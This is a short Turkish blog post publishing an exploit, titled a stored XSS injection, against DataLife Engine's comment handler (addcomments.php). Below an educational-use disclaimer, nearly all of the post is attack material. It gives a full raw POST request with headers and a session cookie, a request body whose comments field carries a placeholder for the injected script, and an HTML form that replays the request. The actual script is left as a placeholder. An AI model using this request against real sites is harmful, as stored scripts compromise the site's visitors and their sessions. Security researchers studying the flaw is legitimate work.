|

DLE Stored XSS Enjeksiyon


alicangonullu tarafından 2019-12-20 21:04:41 tarihinde yazıldı. Tahmini okunma süresi 1 dakika, 7 saniye. 596 kere görüntülendi.



Disclaimer

The information provided in this blog post is intended for educational and informational purposes only. It is not intended to encourage or promote any illegal or unethical activities, including hacking, cyberattacks, or any form of unauthorized access to computer systems, networks, or data.

Yasal Uyarı
Bu blog yazısında sağlanan bilgiler yalnızca eğitim ve bilgilendirme amaçlıdır. Bilgisayar korsanlığı, siber saldırılar veya bilgisayar sistemlerine, ağlara veya verilere herhangi bir şekilde yetkisiz erişim de dahil olmak üzere herhangi bir yasa dışı veya etik olmayan faaliyeti teşvik etme veya reklamlama amacı taşımaz.
Yasal bilgiler için yasal sayfasını inceleyebilirsiniz .

DLE Stored XSS Injection
# Exploit Author : Ali Can Gönüllü
# Exploit Date : 16-12-2019
# Source : https://github.com/Resert/dle
# Exploit :
POST https://xss.com/engine/ajax/addcomments.php
Host: xss.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html, /; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1469
Origin: https://www.xss.org
Connection: keep-alive
Cookie: PHPSESSID=mhumqqrv70ju2hmpfr0qdflkb1
post_id=id&comments=xss_code&name=name&mail=mail@mail.com&editor_mode=&skin=Red&sec_code=editting_plz&question_answer=&g_recaptcha_response=&allow_subscribe=0
<form action="https://xss.org/engine/ajax/addcomments.php" method="post">
<input type="text" name="post_id" value="id"><br>
<input type="text" name="comments" value="comment"><br>
<input type="hidden" name="editor_mode" value=""><br>
<input type="hidden" name="skin" value="Red"><br>
<input type="text" name="sec_code" value="edit"><br>
<input type="text" name="question_answer" value="edit"><br>
<input type="submit" value="Submit">
</font>
Show this code : Ex. quote.php?id=id